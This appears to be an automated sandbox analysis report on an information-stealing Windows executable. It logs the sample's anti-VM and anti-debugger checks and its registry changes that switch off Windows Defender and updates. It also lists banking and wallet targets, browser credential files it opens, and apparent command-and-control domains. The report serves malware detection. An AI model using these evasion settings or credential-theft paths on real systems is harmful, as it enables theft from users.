              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeRDTSC instruction interceptor: First address: 6E564E second address: 6E5658 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FDE8CE8B4C6h 0x0000000a rdtsc
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeRDTSC instruction interceptor: First address: 6E5658 second address: 6E565C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeRDTSC instruction interceptor: First address: 6E56EC second address: 6E5755 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jne 00007FDE8CE8B4DFh 0x00000011 push edx 0x00000012 jmp 00007FDE8CE8B4D7h 0x00000017 pop edx 0x00000018 nop 0x00000019 call 00007FDE8CE8B4CDh 0x0000001e jmp 00007FDE8CE8B4CBh 0x00000023 pop edx 0x00000024 jmp 00007FDE8CE8B4CEh 0x00000029 push 00000000h 0x0000002b mov dword ptr [ebp+122D1D6Eh], edi 0x00000031 call 00007FDE8CE8B4C9h 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push esi 0x0000003b pop esi 0x0000003c rdtsc
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeRDTSC instruction interceptor: First address: 6E5755 second address: 6E575F instructions: 0x00000000 rdtsc 0x00000002 ja 00007FDE8C51D4D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeRDTSC instruction interceptor: First address: 6E575F second address: 6E577C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeRDTSC instruction interceptor: First address: 6E577C second address: 6E578A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push ebx 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeRDTSC instruction interceptor: First address: 6E578A second address: 6E5816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [eax] 0x00000008 jno 00007FDE8CE8B4DDh 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jmp 00007FDE8CE8B4CFh 0x00000017 pop eax 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007FDE8CE8B4C8h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 00000015h 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 push 00000003h 0x00000034 sub dword ptr [ebp+122D1D2Eh], esi 0x0000003a push 00000000h 0x0000003c jmp 00007FDE8CE8B4D9h 0x00000041 push 00000003h 0x00000043 mov cx, ax 0x00000046 call 00007FDE8CE8B4C9h 0x0000004b push eax 0x0000004c push edx 0x0000004d push ebx 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeRDTSC instruction interceptor: First address: 6E5816 second address: 6E581B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeRDTSC instruction interceptor: First address: 6E581B second address: 6E5882 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007FDE8CE8B4CFh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e ja 00007FDE8CE8B4CEh 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 jmp 00007FDE8CE8B4CFh 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 jl 00007FDE8CE8B4CCh 0x00000026 jo 00007FDE8CE8B4C6h 0x0000002c push esi 0x0000002d jmp 00007FDE8CE8B4CEh 0x00000032 pop esi 0x00000033 popad 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 push eax 0x00000039 push edx 0x0000003a je 00007FDE8CE8B4C8h 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeRDTSC instruction interceptor: First address: 705C1C second address: 705C20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeRDTSC instruction interceptor: First address: 6D76EB second address: 6D76F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FDE8CE8B4C6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeRDTSC instruction interceptor: First address: 703BF4 second address: 703BF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeRDTSC instruction interceptor: First address: 703E6E second address: 703E74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeRDTSC instruction interceptor: First address: 70411A second address: 704120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeRDTSC instruction interceptor: First address: 7044B7 second address: 7044E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8CE8B4CEh 0x00000009 popad 0x0000000a jo 00007FDE8CE8B4D5h 0x00000010 jmp 00007FDE8CE8B4CFh 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 pop edi 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b rdtsc
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeRDTSC instruction interceptor: First address: 7046B8 second address: 7046CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeRDTSC instruction interceptor: First address: 7046CA second address: 7046D4 instructions: 0x00000000 rdtsc 0x00000002 je 00007FDE8CE8B4D2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 8CEC7B instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 8CC502 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A7767C instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: AFD6DF instructions caused by: Self-modifying code
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeSpecial instruction interceptor: First address: 55DC12 instructions caused by: Self-modifying code
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeSpecial instruction interceptor: First address: 55DD20 instructions caused by: Self-modifying code
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeSpecial instruction interceptor: First address: 73569E instructions caused by: Self-modifying code
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeSpecial instruction interceptor: First address: 712B2F instructions caused by: Self-modifying code
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeSpecial instruction interceptor: First address: 7A662D instructions caused by: Self-modifying code
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeMemory allocated: 4D70000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeMemory allocated: 5030000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeMemory allocated: 4D70000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeCode function: 3_2_006E568C rdtsc 3_2_006E568C
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 5976Thread sleep time: -180000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe TID: 5712Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: file.exe, file.exe, 00000000.00000002.1723433409.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe, 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe, 00000003.00000002.1867405325.00000000006EB000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000003.1533685372.00000000055DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696494690p
              Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
              Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
              Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
              Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
              Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
              Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
              Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
              Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
              Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
              Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
              Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
              Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
              Source: file.exe, file.exe, 00000000.00000002.1724509005.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722621117.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1724441656.0000000000D3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
              Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
              Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
              Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
              Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
              Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
              Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
              Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
              Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
              Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
              Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
              Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
              Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
              Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
              Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
              Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
              Source: file.exe, 00000000.00000002.1723433409.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe, 00000003.00000002.1867405325.00000000006EB000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
              Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
              Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeFile opened: NTICE
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeFile opened: SICE
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeCode function: 3_2_006E568C rdtsc 3_2_006E568C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B0F10 LdrInitializeThunk,0_2_008B0F10
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: file.exeString found in binary or memory: navygenerayk.store
              Source: file.exeString found in binary or memory: scriptyprefej.store
              Source: file.exeString found in binary or memory: necklacedmny.store
              Source: file.exeString found in binary or memory: founpiuer.store
              Source: file.exeString found in binary or memory: fadehairucw.store
              Source: file.exeString found in binary or memory: thumbystriw.store
              Source: file.exeString found in binary or memory: presticitpo.store
              Source: file.exeString found in binary or memory: crisiwarny.store
              Source: file.exe, 00000000.00000002.1723864274.0000000000A98000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 'TProgram Manager
              Source: 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe, 00000003.00000002.1867739547.000000000073F000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: ei>Program Manager
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1Jump to behavior
              Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableIOAVProtection 1Jump to behavior
              Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableRealtimeMonitoring 1Jump to behavior
              Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\NotificationsRegistry value created: DisableNotifications 1Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeRegistry value created: TamperProtection 0Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptionsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdatesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocationsJump to behavior
              Source: file.exe, 00000000.00000002.1724509005.0000000000D90000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722621117.0000000000D90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 4936, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: file.exe, 00000000.00000003.1566660244.0000000000E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets
              Source: file.exe, 00000000.00000003.1566660244.0000000000E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
              Source: file.exeString found in binary or memory: Jaxx Liberty
              Source: file.exe, 00000000.00000003.1566660244.0000000000E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: file.exe, 00000000.00000003.1548543584.00000000055D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: xtensions/ExodusWeb3nIdWRaXZ40581Z
              Source: file.exe, 00000000.00000002.1724441656.0000000000D3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
              Source: file.exe, 00000000.00000003.1566660244.0000000000E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: file.exe, 00000000.00000003.1566660244.0000000000E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
